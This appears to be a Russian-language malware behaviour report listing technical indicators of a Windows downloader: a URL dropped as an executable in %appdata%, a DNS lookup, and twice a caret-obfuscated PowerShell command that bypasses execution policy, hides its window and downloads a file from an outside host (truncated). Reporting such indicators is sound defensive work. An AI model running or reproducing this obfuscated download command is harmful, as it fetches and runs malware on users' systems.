Техническая информация
- http://transporingsytw.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PO^WeRSH^eLl^.eXE ^-E^XeCutIonPol^I^Cy BY^pAS^s ^-NOp^ROFi^le -wIN^d^owsTyL^E Hi^dD^e^n^ (nEW-O^bJe^ct^ sYSte^M.neT^.we^bcLi^ent).^dO^W^N^lOAD^F^ILe^('http://transporingsytw.w...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /c "PO^WeRSH^eLl^.eXE ^-E^XeCutIonPol^I^Cy BY^pAS^s ^-NOp^ROFi^le -wIN^d^owsTyL^E Hi^dD^e^n^ (nEW-O^bJe^ct^ sYSte^M.neT^.we^bcLi^ent).^dO^W^N^lOAD^F^ILe^('http://transporingsytw.w...' (со скрытым окном)